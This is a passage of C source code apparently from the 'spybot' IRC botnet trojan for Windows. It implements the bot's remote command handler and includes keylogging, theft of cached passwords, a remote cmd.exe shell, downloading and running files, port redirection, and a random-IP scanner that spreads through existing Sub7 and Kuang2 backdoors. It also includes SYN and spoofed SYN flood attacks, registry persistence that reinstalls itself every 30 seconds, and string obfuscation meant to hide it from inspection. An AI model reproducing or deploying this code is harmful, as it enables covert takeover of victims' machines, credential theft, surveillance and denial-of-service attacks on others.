 412 	s[0] = strtok(line1, " ");
 413 	for (i = 1; i < 6; i++) s[i] = strtok(NULL, " ");
 414 	memset(sendtochan,0,sizeof(sendtochan));
 415 	info = FALSE;
 416 	HANDLE Threat_Handle;
 417 	if (strcmp("raw", command) == 0)  {
 418 		strncpy(x, line+4, sizeof(x)-1);
 419 		sendto = NULL;
 420 		sendsock = ircsock;
 421 	}
 422 	else if (strcmp("threads",command) == 0) {
 423 		for (i=0;i <= 40;i++) {
 424 			if (threads[i].id != 0) {
 425 				sprintf(x,"%i: %s",i,threads[i].name);
 426 	
 427       
 428 				strcat(x,"\r\n");
 429 				if (sendto == NULL) //send to DCC chat
 430 					send(sendsock,x,strlen(x),0);
 431 				else if (sendsock != 0) {
 432 					sprintf(y,"PRIVMSG %s :%s",sendto,x);
 433 					send(sendsock,y,strlen(y),0);
 434 				}
 435 			}
 436 		}	
 437 		return 0;
 438 		
 439 	}
 440 	else if (strcmp("spy",command) == 0 && sendto == NULL) {
 441 		sprintf(x,"Spying on irc connection");
 442 		dccspy = sendsock;
 443 	}
 444 	else if (strcmp("stopspy",command) == 0) {
 445 		sprintf(x,"Spy stoped");
 446 		dccspy = 0;
 447 	}
 448 	else if (strcmp("uninstall",command) == 0) {
 449 		writekeys(TRUE);
 450 	}
 451 	else if (strcmp("info", command) == 0)  {
 452 		sysinfo(x,sendsock);
 453 	}
 454 	else if (strcmp("passwords",command) == 0) {
 455 		if (cashedpasswords(sendsock,sendto) == 0) strcpy(x,OK);
 456 		else strcpy(x,Error);
 457 	}
 458 	else if (strcmp("startkeylogger", command) == 0)  {
 459 		if (sendkeysto == 1) sprintf(x,"error already logging keys to %s use \"stopkeylogger\" to stop",keylogchan);
 460 		else {
 461 			if (sendto != NULL) {
 462 				sprintf(keylogchan,sendto);
 463 				sprintf(x,"Keylogger active output to: %s",keylogchan);
 464 			}
 465 			else {
 466 				memset(keylogchan,0,sizeof(keylogchan));
 467 				sprintf(x,"Keylogger active output to: DCC chat");
 468 			}
 469 			sendkeysto = 1;
 470 			keysock = sendsock;
 471 			BOOL keylog = FALSE;
 472 			for (c=0;c <= 20;c++)
 473 				if (threads[c].id == 2) {  keylog = TRUE; break; }
 474 			if (keylog == FALSE) {
 475 				Threat_Handle = CreateThread(NULL, 0, &keylogger, NULL, 0, &id);
 476 				sprintf(buf,"Keylogger logging to %s",keylogchan);
 477 				addthread(buf,0,Threat_Handle,2,"\0");
 478 			}
 479 			
 480 			sendkeysto = 1;
 481 		}
 482 	}
 483 	else if (strcmp("stopkeylogger", command) == 0)  {
 484 		sendkeysto = 0;
 485 		memset(keylogchan,0,sizeof(keylogchan));
 486 		sprintf(x,"Keylogger stoped");
 487 	}
 488 	else if (strcmp("listprocesses", command) == 0)  {
 489 		if (listProcesses(sendsock,sendto,NULL,FALSE) == 0) strcpy(x,OK);
 490 		else strcpy(x,Error);
 491 	}
 492 	else if (strcmp("reconnect", command) == 0 && sendto != NULL)  {
 493 		send(sendsock,"QUIT\n\r",8,0);
 494 		return 2;
 495 	}
 496 	#ifdef use_funstuf //lame stuf :-)
 497 	else if (strcmp("keyboardlights", command) == 0)  {
 498 		for (i = 0;i < 50;i++)
 499 		{
 500 			Keyevent(VK_CAPITAL,FALSE);
 501 			Keyevent(VK_SCROLL,FALSE);
 502 			Keyevent(VK_NUMLOCK,FALSE);
 503 			Sleep(200);
 504 		}
 505 		strcpy(x,OK);
 506 	}
 507 	#endif
 508 	else if (strcmp("disconnect", command) == 0 && sendto != NULL)  {
 509 		if (s[1] != NULL) distime = atoi(s[1]) * 1000;
 510 		send(sendsock,"QUIT\n\r",strlen("QUIT\n\r"),0);
 511 		return 3;
 512 	}
 513 	else if (strcmp("quit", command) == 0)  {
 514 		return 1;
 515 	}
 516 	else if (strcmp("reboot", command) == 0)  {
 517 		if (ExitWindowsEx(EWX_FORCE,0) == 0) strcpy(x,Error);
 518 		else strcpy(x,"QUIT Bye Bye\n\r");
 519 	}
 520 	#ifdef remote_cmd
 521 	else if (strcmp("opencmd",command) == 0) {
 522 		if (open_cmd(sendsock,sendto) == -1) strcpy(x,Error);
 523 		else strcpy(x,"cmd.exe has started type \"cmd help\" for commands");
 524 	}
 525 	else if (strcmp("cmd",command) == 0) {
 526 		DWORD bw;
 527 		if (s[1] != NULL) {
 528 			strcat(line,"\n");
 529 			sprintf(line1,strstr(line," ")+1);
 530 		}
 531 		else sprintf(line1,"\n");
 532 		bw = strlen(line1);
 533 		if (!WriteFile(hChildInWrDupe,line1,bw,&bw,NULL)) {
 534 			Close_Handles();
 535 			strcpy(x,Error);
 536 		}
 537 	}
 538 	#endif
 539         else if (s[1] != NULL) {
 540 		if (strcmp("delete", command) == 0) {
 541 			if (DeleteFile(strstr(line," ")+1)) strcpy(x,OK);
 542 			else strcpy(x,Error);
 543 		}
 544 		else if (strcmp("server",command) == 0 && sendto != NULL) {
 545 			memset(IRC_server,0,sizeof(IRC_server));
 546 			strcpy(IRC_server,s[1]);
 547 			send(sendsock,"QUIT\n\r",8,0);
 548 			return 2;
 549 		}
 550 		else if (strcmp("execute", command) == 0) {
 551 			if ((int) ShellExecute(0, "open", strstr(line," ")+1, NULL, NULL, SW_SHOW) < 33) strcpy(x,Error);
 552 			else strcpy(x,OK);
 553 		}
 554 		else if (strcmp("makedir", command) == 0) {
 555 			if (CreateDirectory(strstr(line," ")+1, 0)) strcpy(x,OK);
 556 			else strcpy(x,Error);
 557 		}
 558 		else if (strcmp("list", command) == 0)  {
 559 			getfiles(line+5,sendsock,sendto,NULL);
 560 			strcpy(x,OK);
 561 		}
 562 		#ifdef use_funstuf //lame stuf :-)
 563 		else if (strcmp("cd-rom", command) == 0) {
 564 			if (atoi(s[1]) == 0) {
 565 				strcpy(x,"cd-rom drive closed");
 566 				mciSendString("set CDAudio door closed", NULL, 127, 0);
 567 			}
 568 			else {
 569 				strcpy(x,"cd-rom drive opened");
 570 				mciSendString("set CDAudio door open", NULL, 127, 0);
 571 			}
 572 		}
 573 		#endif
 574 		else if (strcmp("killprocess", command) == 0) {
 575 			if (listProcesses(sendsock,NULL,s[1],FALSE) == 1) strcpy(x,OK);
 576 			else strcpy(x,Error);
 577 
 578 		}
 579 		#ifdef use_funstuf //lame stuf :-)
 580 		else if (strcmp("sendkeys", command) == 0)  {
 581 			strncpy(x, line+10, sizeof(x)-1);
 582 			int c = 0;
 583 			int z;
 584 			char chr[2];
 585 			char bla[10];
 586 			for (i = 0;i < strlen(x);i++)
 587 			{
 588 				memset(chr,0,sizeof(chr));
 589 				chr[0] = x[i];
 590 				for (c = 0;c < 92;c++)
 591 				{
 592 
 593 					if (strcmp(chr,"�") == 0) { //bold (ctrl + b) = RETURN
 594 						Keyevent(VK_RETURN,FALSE);
 595 						break;
 596 					}
 597 					else if (strcmp(chr,"�") == 0) { //underlined (ctrl + u) = backspace
 598 						Keyevent(VK_BACK,FALSE);
 599 						break;
 600 					}
 601 					else if (strcmp(chr,outputL[c]) == 0) {
 602 						z = inputL[c];
 603 						Keyevent(z,FALSE);
 604 						break;
 605 					}
 606 					else if (strcmp(chr,outputH[c]) == 0) {
 607 						z = inputL[c];
 608 						Keyevent(z,TRUE);
 609 						break;
 610 					}
 611 				}
 612 			}
 613 			strcpy(x,OK);
 614 
 615 		}
 616 		#endif
 617 		else if (strcmp("killthread", command) == 0)  {
 618 			int t = atoi(s[1]);
 619 			if (t > 39) return 0;
 620 			if (threads[t].id != 0) {
 621 				if (TerminateThread(threads[t].Threat_Handle,0) == 0) strcpy(x,Error);
 622 				else {
 623 					sprintf(x,"Thread killed (%s)",threads[t].name);
 624 					closesocket(threads[t].sock);
 625 					if (threads[t].id == 2) { memset(keylogchan,0,sizeof(keylogchan)); sendkeysto = 0; }
 626 					if (threads[t].id == 4) {
 627 						for (i=0;i <= 9;i++)
 628 							if (scan[i].state != 0 && scan[i].thread == t) { scan[i].state = 0; break; }
 629 					}
 630 
 631 					threads[t].id = 0;
 632 					
 633 				}
 634 			}
 635 		}
 636 		else if (strcmp("get",command) == 0 && sendto != NULL) { //dcc GET
 637 			dcchosts = sendsock;
 638 			memset(dccfilename,0,sizeof(dccfilename));
 639 			memset(dcchost,0,sizeof(dcchost));
 640 			strcpy(sendtochan,sendto);
 641 			sprintf(dccfilename,strstr(line," ")+1);
 642 			CreateThread(NULL, 0, &dcc_send, NULL, 0, &id);
 643 			while (info == FALSE) Sleep(10);
 644 		}
 645 		#ifdef WEB_DOWNLOAD
 646 		else if (strcmp("download",command) == 0) {
 647 			dcchosts = sendsock;
 648 			if (sendto != NULL) strcpy(sendtochan,sendto); 
 649 			sprintf(x,"download %s %s",s[1],s[2]);
 650 			i = addthread(x ,0,NULL,8,s[2]);
 651 			sprintf(threads[i].dir,s[1]);
 652 			sprintf(threads[i].file,s[2]);
 653 			Threat_Handle = CreateThread(NULL, 0, &download,(LPVOID)i, 0, &id);
 654 			threads[i].Threat_Handle = Threat_Handle;
 655 					
 656 		}
 657 		#endif
 658 		else if (s[2] != NULL) {
 659 			if (strcmp("httpserver",command) == 0) {
 660 				int poort = atoi(s[1]);
 661 				memset(buf,0,sizeof(buf));
 662 				sprintf(buf,s[2]);
 663 				for(i=3;s[i] != NULL;i++) 
 664 					sprintf(buf,"%s %s",buf,s[i]);
 665 				i = HTTP_server(buf,poort);
 666 				if (i == -1) sprintf(x,Error);
 667 				else 
 668 					sprintf(x,"%s Address http://%s:%i/ .",threads[i].name,IP,poort);
 669 			}
 670 			
 671 
 672 
 673 			else if (strcmp("rename",command) == 0) {
 674 				if (MoveFile(s[1],s[2]) == 0) strcpy(x,Error);
 675 				else strcpy(x,OK);
 676 			}
 677 
 678 			else if (s[3] != NULL) {
 679 				dcchosts = sendsock;
 680 				memset(dccfilename,0,sizeof(dccfilename));
 681 				memset(dcchost,0,sizeof(dcchost));
 682 				if (sendto != NULL) strcpy(sendtochan,sendto); 
 683  		 		if (strcmp("SEND",command) == 0) { //dcc send
 684 					sprintf(dccfilename,s[1]);
 685 					sprintf(dcchost,s[2]);
 686 					dccport = atoi(s[3]);
 687 					CreateThread(NULL, 0, &dcc_getfile, NULL, 0, &id);
 688 					while (info == FALSE) Sleep(5);
 689 					
 690 				}
 691 				else if (strcmp("CHAT",command) == 0 && sendto != NULL) { //dcc chat
 692 					sprintf(dcchost,s[2]);
 693 					dccport = atoi(s[3]);
 694 					CreateThread(NULL, 0, &dcc_chat, NULL, 0, &id);
 695 					while (info == FALSE) Sleep(5);
 696 				}
 697 				else if (strcmp("redirect",command) == 0) {
 698 					SOCKET sock;
 699 					if ((sock = Listen(atoi(s[1]))) == -1) strcpy(x,Error);
 700 					else {
 701 						sprintf(x,"redirect %s:%i > %s:%i",IP,atoi(s[1]),s[2],atoi(s[3]));
 702 						i = addthread(x ,sock,NULL,6,s[2]);
 703 						threads[i].port = atoi(s[3]);
 704 						sprintf(threads[i].dir,s[2]);
 705 						Threat_Handle = CreateThread(NULL, 0, &port_redirect,(LPVOID)i, 0, &id);
 706 						threads[i].Threat_Handle = Threat_Handle;
 707 					}
 708 				}
 709 				else if (strcmp("scan",command) == 0) {
 710 					for (i=0;i <= 9;i++)
 711 						if (scan[i].state == 0) break;
 712 					if (i > 9) return 0; //all threads full
 713 						
 714 					if (strcmp("0",s[1]) == 0) { //we start at a random ip address
 715 						srand(GetTickCount());
 716 						sprintf(scan[i].ip,"%i.%i.%i.0",rand()%255,rand()%255,rand()%255);
 717 					}
 718 					else sprintf(scan[i].ip,s[1]);
 719 					scan[i].port = atoi(s[2]);
 720 					scan[i].delay = atoi(s[3]) * 1000;
 721 					scan[i].extra = 0;
 722 					if (s[4] != NULL) {
 723 						#ifdef SUB7_SPREADER
 724 						if (strcmp(s[4],"sub7") == 0) scan[i].extra = 1;
 725 						#endif
 726 						#ifdef KUANG2_SPREADER
 727 						if (strcmp(s[4],"kuang") == 0) scan[i].extra = 2;
 728 						#endif
 729 					}
 730 					sprintf(scan[i].file,"\0");
 731 					sprintf(scan[i].chan,"\0");
 732 					scan[i].sock = sendsock;
 733 					if (sendto != NULL) sprintf(scan[i].chan,sendto); //channel or query
 734 					if (s[4] != NULL && scan[i].extra == 0) { //we are gona log to a file
 735 						char sysdir[MAX_PATH];
 736 						GetSystemDirectory(sysdir, sizeof(sysdir));
 737 						sprintf(scan[i].file,"%s\\%s",sysdir,s[4]);
 738 					}
 739 					Threat_Handle = CreateThread(NULL, 0, &port_scanner,(LPVOID)i, 0, &id);
 740 					if (Threat_Handle) {	
 741 						if (strlen(scan[i].file) > 2) sprintf(x,"Portscanner startip: %s port: %i delay: %ssec. logging to: %s",scan[i].ip,scan[i].port,s[3],scan[i].file);
 742 						else sprintf(x,"Portscanner startip: %s port: %i delay: %ssec.",scan[i].ip,scan[i].port,s[3]);
 743 						scan[i].thread = addthread(x ,0,Threat_Handle,4,"\0");			
 744 					}
 745 					else 
 746 						strcpy(x,Error);
 747 				}
 748 				#ifdef SYN_FLOOD
 749 				else if (strcmp("syn",command) == 0 && s[4] != NULL) {
 750 					for (i=0;i < 10;i++)
 751 						if (syn[i].state == 0) break;
 752 					if (i > 9) return 0; //all threads full
 753 					strcpy(syn[i].host,s[1]);
 754 					syn[i].port = atoi(s[2]);
 755 					syn[i].delay = atoi(s[3]);
 756 					if (syn[i].delay < 5) syn[i].delay = 5;
 757 					syn[i].times = atoi(s[4]);
 758 					memset(x,0,sizeof(x));
 759 					sprintf(x,"SynFlooding: %s port: %i delay: %i times:%i.",syn[i].host,syn[i].port,syn[i].delay,syn[i].times);
 760 					Threat_Handle = CreateThread(NULL, 0, &syn_flood,(LPVOID)i, 0, &id);
 761 					if (Threat_Handle) 
 762 						syn[i].thread = addthread(x ,0,Threat_Handle,5,"\0");	
 763 					else strcpy(x,Error);
 764 
 765 				}
 766 				#endif
 767 				#ifdef SPOOFD_SYNFLOOD
 768 				else if (strcmp("spoofdsyn",command) == 0 && s[4] != NULL) {
 769 					for (i=0;i < 10;i++)
 770 						if (Spoofdsyn[i].state == 0) break;
 771 					if (i > 9) return 0; //all threads full
 772 					Spoofdsyn[i].TargetIP = inet_addr(s[1]);
 773 					Spoofdsyn[i].port = atoi(s[2]);
 774 					Spoofdsyn[i].delay = atoi(s[3]);
 775 					Spoofdsyn[i].sock = sendsock;
 776 					if (Spoofdsyn[i].delay < 5) Spoofdsyn[i].delay = 5;
 777 					Spoofdsyn[i].times = atoi(s[4]);
 778 					memset(x,0,sizeof(x));
 779 					sprintf(x,"SynFlooding: %s port: %i delay: %i times:%i.",s[1],Spoofdsyn[i].port,Spoofdsyn[i].delay,Spoofdsyn[i].times);
 780 					Threat_Handle = CreateThread(NULL, 0, &Spoofd_syn,(LPVOID)i, 0, &id);
 781 					if (Threat_Handle) 
 782 						Spoofdsyn[i].thread = addthread(x ,0,Threat_Handle,7,"\0");	
 783 					else strcpy(x,Error);
 784 
 785 				}
 786 				#endif
 787 			}
 788 		}
 789 	}
 790 	else return 0;
 791 	if (strlen(x) == 0) return 0;
 792 	strcat(x,"\r\n");
 793 	if (sendto == NULL) //send to DCC chat
 794 		send(sendsock,x,strlen(x),0);
 795 	else if (sendsock != 0) {
 796 		sprintf(y,"PRIVMSG %s :%s",sendto,x);
 797 		send(sendsock,y,strlen(y),0);
 798 	}
 799 
 800 	return 0;
 801 }
 802 
 803 
 804 
 805 
 806 int addthread(char *name,SOCKET sock,HANDLE Threat_Handle,int id,char * dir)
 807 {
 808 	int c;
 809 	for (c=0;c <= 40;c++)
 810 		if (threads[c].id == 0) break;
 811 	if (c > 19) return -1;
 812 	sprintf(threads[c].name,name);
 813 	threads[c].id = id;
 814 	threads[c].num = c;
 815 	threads[c].sock = sock;
 816 	threads[c].Threat_Handle = Threat_Handle;
 817 	sprintf(threads[c].dir,dir);
 818 	return c;
 819 }
 820 
 821 
 822 //simple decrypt function prevent people to see the important stuff with a hexediter
 823 
 824 char * decrypt(char *str,int key)
 825 {
 826  	for (BYTE i = 0;str[i] != 0; i++) {
 827          	 str[i] = str[i] - key;
 828         }
 829 	return str;
 830 }
 831 
 832 
 833 DWORD WINAPI keepkeys(LPVOID param) //when the startup keys are removed we create them again ;-)
 834  {
 835 	while (1)
 836 	{
 837 		writekeys(FALSE);
 838 		Sleep(30000);
 839 	}
 840 	return 0; //will never hapen but if you remove it it will generate a warning..
 841 }
 842 
 843 void writekeys(BOOL uninstal)
 844 {
 845 	unsigned long size = 250;
 846 	HKEY key;
 847 	BYTE  buf[200];
 848 	RegCreateKeyEx(HKEY_CURRENT_USER, runoncekey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 849 	if (uninstal) {
 850 		RegDeleteValue(key,( LPCTSTR ) valuename);
 851 	}
 852     	else if (RegQueryValueEx(key, ( LPCTSTR ) valuename , 0, 0,buf, &size) != ERROR_SUCCESS || strcmp(buf, filename) != 0) {
 853       	        RegSetValueEx(key, valuename, 0, REG_SZ, filename, 127);
 854 	}
 855 	RegCloseKey(key);
 856 	RegCreateKeyEx(HKEY_LOCAL_MACHINE, runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 857 	if (uninstal) {
 858 		RegDeleteValue(key,( LPCTSTR ) valuename);
 859 		RegCloseKey(key);
 860 		ExitProcess(0);
 861 	}
 862     	if (RegQueryValueEx(key, ( LPCTSTR ) valuename , 0, 0,buf, &size) != ERROR_SUCCESS || strcmp(buf, filename) != 0) 
 863 		        RegSetValueEx(key, valuename, 0, REG_SZ, filename, 127);
 864 	RegCloseKey(key);
 865 }
 866 /*
 867 char registrykey[] = "Software\\spybot";
 868 char  readkey[512];
 869 char * Regreadkey(int num)
 870 {
 871 	unsigned long size = 512;
 872 	HKEY key;
 873 	char Rkey[512];
 874 	memset(Rkey,0,sizeof(Rkey));
 875 	memset(readkey,0,sizeof(readkey));
 876 	sprintf(Rkey,"data%i",num);
 877 	RegCreateKeyEx(HKEY_LOCAL_MACHINE, registrykey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 878   
 879 	if (RegQueryValueEx(key, ( LPCTSTR ) Rkey , 0, 0,readkey, &size) == ERROR_SUCCESS) {    	    
 880 		RegCloseKey(key);
 881 		return readkey;
 882 	}
 883 	RegCloseKey(key);
 884 	return NULL;
 885 }
 886 void regwritekey(char *serv,int num)
 887 {
 888 	HKEY key;
 889 	char Rkey[512];	
 890 	sprintf(Rkey,"data%i",num);
 891 	RegCreateKeyEx(HKEY_LOCAL_MACHINE, registrykey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 892     	RegSetValueEx(key, Rkey, 0, REG_SZ, serv, 127);
 893 }
 894 
 895 */
 896 
 897 //connect functie
 898 
 899 int irc_connect(char * serveraddr,int poort)
 900 {
 901 	DWORD err;
 902 	memset(IRC_server,0,sizeof(IRC_server));
 903 	strcpy(IRC_server,serveraddr);
 904 	restart:;
 905 	SOCKET Server;
 906 	if ((Server = create_sock(IRC_server,poort)) == SOCKET_ERROR) return 0;
 907 	err = irc_read(Server);
 908 	if (err == 2) goto restart;
 909 	else if (err == 3) { 
 910 		Sleep(distime);
 911 		goto restart;
 912 	}
 913 	return err;
 914 
 915 }
 916 
 917 void getnick()
 918 {
 919 	char username[250];
 920 	memset(username,0,sizeof(username));
 921 	memset(nick,0,sizeof(nick));
 922 	if (GetUserName(username, &nSize))
 923 		strcpy(realname,username);
 924 	strtok(username," ");
 925 	if (strlen(username) < 3 || strlen(username) > 20 || strcmp(username,"Administrator") == 0 || strcmp(username,"Default") == 0)  //we create a random nick
 926 		randnick();
 927 	else {
 928 		srand(GetTickCount());
 929 		sprintf(nick,"%s%i",username,(rand()%99));//add a random number at the end of the username
 930 	}
 931 }
 932 void randnick()
 933 {
 934 	memset(nick,0,sizeof(nick));
 935 	int c, len;
 936 	srand(GetTickCount());
 937 	len = (rand()%3)+4;
 938 	for (c=0; c<len; c++) nick[c] = (rand()%26)+97;
 939 	nick[c+1] = '\0';
 940 	strcpy(realname,nick);
 941 }
 942 int irc_read(SOCKET Server)
 943 {
 944 	char *line;
 945 	char buf[5096];
 946 	char buffer[4096];
 947 	int er = 1;
 948 	int i;
 949 	memset(logins,0,sizeof(logins));
 950 	SOCKADDR sa;
 951 	int sas;
 952 	memset(IP,0,sizeof(IP));
 953 	sas = sizeof(sa);
 954 	memset(&sa, 0, sizeof(sa));
 955 	getsockname(Server, &sa, &sas);
 956 	sprintf(IP,"%d.%d.%d.%d",(BYTE)sa.sa_data[2], (BYTE)sa.sa_data[3], (BYTE)sa.sa_data[4], (BYTE)sa.sa_data[5]);
 957 	getnick();
 958 	sprintf(buffer,"NICK %s\r\n USER %s \"hotmail.com\" \"%s\" :%s\r\n",nick,nick,IP,realname);
 959       	send(Server, buffer, strlen(buffer), 0);
 960 	TIMEVAL time;
 961    	fd_set fd_struct;
 962     	time.tv_sec = 60;//timeout after 60 sec.
 963     	time.tv_usec = 0;
 964    	FD_ZERO(&fd_struct);
 965     	FD_SET(Server, &fd_struct);
 966 	if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
 967 	{
 968 		closesocket(Server); //the server didnt responce within 60 sec. so we try a other server
 969 		return 0;
 970 	}
 971 
 972 	while (1) {
 973 		memset(buffer,0,sizeof(buffer));
 974 		memset(buf,0,sizeof(buf));
 975 		int len;
 976 		if ((len = recv(Server, buffer,sizeof(buffer), 0)) <= 0) 
 977 			break;
 978 		int t,r;
 979 		if (dccspy > 0) send(dccspy,buffer, strlen(buffer), 0);
 980 		for (t=0;t<len;t++)
 981 		{
 982 			if (buffer[t] == '\r') {
 983 				r=0;
 984 				er = irc_readline(buf,Server);
 985 				if (er > 0) {
 986 					closesocket(Server);
 987 					return er;
 988 				}
 989 				memset(buf,0,sizeof(buf));
 990 			}
 991 			else if (buffer[t] == '\0' || buffer[t] == '\n' || buffer[t] == '\r') continue;
 992 			else {
 993 				buf[r] = buffer[t];
 994 				r++;
 995 			}
 996 
 997 		}
 998 	}
 999 	closesocket(Server);
1000 	return 0;
1001 }
1002 
1003 int irc_readline(char * line,SOCKET Server)
1004 {
1005 	char buf[512];
1006 	char line1[512];
1007 	char *s[5];
1008 	char *x;
1009 	char *y;
1010 	char user[50];
1011 	int i,c,w;
1012 	int q = 3;
1013 	int err = 0;
1014 	BOOL master = FALSE;
1015 	memset(buf,0,sizeof(buf));
1016 
1017 	strncpy(line1, line, sizeof(line1)-1);
1018 	s[0] = strtok(line1, " ");
1019 	for (i = 1; i < 5; i++) s[i] = strtok(NULL, " ");
1020 	if (s[0] == NULL || s[1] == NULL) return 0;
1021 	if (strcmp("PING", s[0]) == 0) {
1022 		sprintf(buf,"PONG %s\r\n",s[1]+1);
1023 		send(Server, buf, strlen(buf), 0);
1024 	}
1025 	else if (strcmp("376", s[1]) == 0 || strcmp("422", s[1]) == 0) {
1026 		if (channelpass) sprintf(buf,"JOIN %s %s\r\n",channel,channelpass);
1027 		else sprintf(buf,"JOIN %s\r\n",channel);
1028 		send(Server, buf, strlen(buf), 0);
1029 
1030 		#ifdef  rawcommands_after_connect
1031 		raw_commands(Server);
1032 		#endif
1033 	}
1034 	else if (strcmp("433",s[1]) == 0 || strcmp("432",s[1]) == 0) {
1035 		randnick();
1036 		sprintf(buf,"NICK %s\r\n",nick);
1037 		send(Server, buf, strlen(buf), 0);
1038 	}
1039 	if (s[2] == NULL) return 0;
1040 
1041 	#ifdef rawcommands_after_join
1042 	if (strcmp("366",s[1]) == 0) 
1043 		raw_commandsonjoin(Server,s[3]);
1044 	#endif
1045 
1046 	strncpy(user, s[0]+1, sizeof(user)-1);
1047 
1048 	strtok(user, "!");
1049 	if (strcmp("NICK",s[1]) == 0) {
1050 		for (i = 0; i < maxlogins; i++) {
1051 			if (strcmp(logins[i],user) == 0 && logins[i] != NULL) strcpy(logins[i],s[2]);
1052 		}
1053 	}
1054 	if (strcmp("QUIT", s[1]) == 0 || strcmp("PART", s[1]) == 0) {
1055 		for (i = 0; i < maxlogins; i++) {
1056 			if (strcmp(logins[i],user) == 0 && logins[i] != NULL) memset(logins[i],0,sizeof(logins[i]));
1057 		}
1058 
1059 	}
1060 	if (s[3] == NULL) return 0;
1061 	if (strcmp(channel,s[3]) == 0) {
1062 		if (strcmp("471",s[1]) == 0 || strcmp("472",s[1]) == 0 || strcmp("473",s[1]) == 0 || strcmp("474",s[1]) == 0 || strcmp("475",s[1]) == 0) return 4; //we cant join channel ? its full,invite only,whe dont have the correct key or we are banned  maybe some fucking ircop we try a other server
1063 	}
1064 	if (strcmp("KICK", s[1]) == 0) { //hope we are not kicked...
1065 		for (i = 0; i < maxlogins; i++) {
1066 			if (strcmp(logins[i],s[3]) == 0 && logins[i] != NULL) memset(logins[i],0,sizeof(logins[i])); //or master is kicked
1067 		}
1068 		if (strcmp(nick,s[3]) == 0) {
1069 			sprintf(buf,"JOIN %s %s\r\n",channel,channelpass);
1070 			send(Server, buf, strlen(buf), 0);
1071 		}
1072 	}
1073 	if ((strcmp("PRIVMSG",s[1]) == 0 || (strcmp("332",s[1]) == 0 && topiccommands))) { //its a privmsg or topic
1074 		if (strcmp("PRIVMSG",s[1]) == 0) {
1075 			if (strstr(s[2], "#") == NULL) s[2] = user;
1076 			for (i = 0; i < maxlogins; i++) {
1077 				if (strcmp(logins[i],user) == 0 && logins[i] != NULL) master = TRUE;
1078 			}
1079 			if (strcmp(login_command,s[3]+1) == 0 && s[4] != NULL)
1080 			{
1081  				if (master) return 0;
1082 				int x;
1083 				for (x = 0; x < maxlogins; x++) {
1084 					if (logins[x][0] != '\0') continue;
1085 					if (strcmp(password,s[4]) == 0) {
1086 						char * hostname2;
1087 						char * hostname;
1088 						char hostS[512];
1089 						strcpy(hostS,s[0]);
1090 						#ifdef use_nickname_match
1091 						for (i=0;trustednicks[i] != NULL;i++)
1092 						{
1093 							if (strcmp(user,trustednicks[i]) == 0) goto nick;
1094 						}
1095 						return 0;
1096 						nick:;
1097 						#endif
1098 						#ifdef use_ident_match
1099 						char * h_ident;
1100 						hostname2 = strstr(s[0], ":");
1101 						h_ident = strtok(hostname2, "@")+strlen(user)+2;
1102       	       
1103 						for (i=0;trustedidents[i] != NULL;i++)
1104 						{
1105 							if (strcmp(h_ident,trustedidents[i]) == 0) goto ident;
1106 						}
1107 						return 0;
1108 						ident:;
1109 						#endif
1110 						
1111 						#ifdef use_hostname_match
1112 						BOOL goodhost = FALSE;
1113 						hostname = strstr(hostS, "@");
1114 						for (i = -1;trustedhosts[i+1] != NULL; i++) 
1115 						{
1116 
1117 							restart:;
1118 							i++;
1119 							if (trustedhosts[i] == NULL) return 0;
1120 							for (c = 0; c < strlen(trustedhosts[i])-1; c++) {
1121 								if (trustedhosts[i][0] == '*') {
1122 									if (hostname[strlen(hostname) - 1 - c] != trustedhosts[i][strlen(trustedhosts[i]) - 1 -c]) {
1123 										if (trustedhosts[i][strlen(trustedhosts[i]) - 1 -c] != '*') goto restart;
1124 									}
1125 
1126 								}
1127 								else if (hostname[c+1] != trustedhosts[i][c]) {
1128 									if (trustedhosts[i][c] == '*') continue;
1129 									else goto restart;
1130 								}
1131 							}
1132 							goodhost = TRUE;
1133 							break;
1134 						}
1135 						
1136 						if (goodhost || trustedhosts[0] == NULL) {
1137 						#endif
1138 							strcpy(logins[x],  user);
1139 							master = TRUE;
1140 							return 0;
1141 						#ifdef use_hostname_match
1142 						}
1143 						#endif
1144 					}
1145 				}
1146 			}
1147 		}
1148 		else {
1149 			s[2] = s[3];
1150 			q = 4;
1151 		}
1152 		if (!master && strcmp("332",s[1]) != 0) return 0;
1153 		
1154 		if (strcmp(":\1DCC",s[3]) == 0 && s[4] != NULL) {
1155 			x = strstr(line, " :");
1156 			y = strstr(x+1, " ");
1157 			err = read_command(Server,Server,s[4],y+1,s[2]);
1158 		}
1159 		else 	{
1160 			SOCKET sendsock = Server;
1161 			x = strstr(line, " :")+2;
1162 			#ifdef Use_Encrypted_commands
1163 			decrypt(x,commands_decryptkey);
1164       	 		#endif
1165 			if (x[strlen(x)-1] == 's' && x[strlen(x)-2] == '-' && x[strlen(x)-3] == ' ') { x[strlen(x)-1] = '\0'; x[strlen(x)-1] = '\0'; x[strlen(x)-1] = '\0'; sendsock = 0; }
1166 			char command1[512];
1167 			memset(command1,0,sizeof(command1));
1168 			strcpy(command1,x);
1169 			strtok(command1," ");
1170 			if (strcmp(command1,nick) == 0 || strcmp(command1,Bot_Version) == 0)  { 
1171 				char *command2;
1172 				char commandline[512];
1173 				memset(commandline,0,sizeof(commandline));
1174 				strcpy(commandline,x);
1175 				command2 = strstr(x," ");
1176 				strtok(command2," ");
1177 				err = read_command(sendsock,Server,command2+1,commandline+1+strlen(command1+1),s[2]);
1178 			 }
1179 			else 
1180 				err = read_command(sendsock,Server,command1,x,s[2]);
1181 		}
1182 
1183 	}
1184 	return err;
1185 }
1186 DWORD WINAPI keylogger(LPVOID Param)
1187 {
1188 	HWND win, winold;
1189 	int bKstate[256]={0};
1190         int i,x;
1191 	int err = 0;
1192 	int threadnum = (int)Param;
1193 	char buffer[600];
1194 	char buffer2[800];
1195 	char window[61];
1196 	int state;
1197 	int shift;
1198 	char logfile[MAX_PATH];
1199 
1200 	#ifdef start_keylogger_afterstartup
1201 	char sysdir[MAX_PATH];
1202 	GetSystemDirectory(sysdir, sizeof(sysdir));
1203 	sprintf(logfile,"%s\\%s",sysdir,keylogfilename);
1204 	FILE *log;
1205 	log = fopen(logfile,"aw");
1206 	if (log != NULL) {
1207 		char date[70];
1208 		GetDateFormat(0x409,0,0,"\n[dd:MMM:yyyy, ",date,70);
1209 		fputs(date,log);
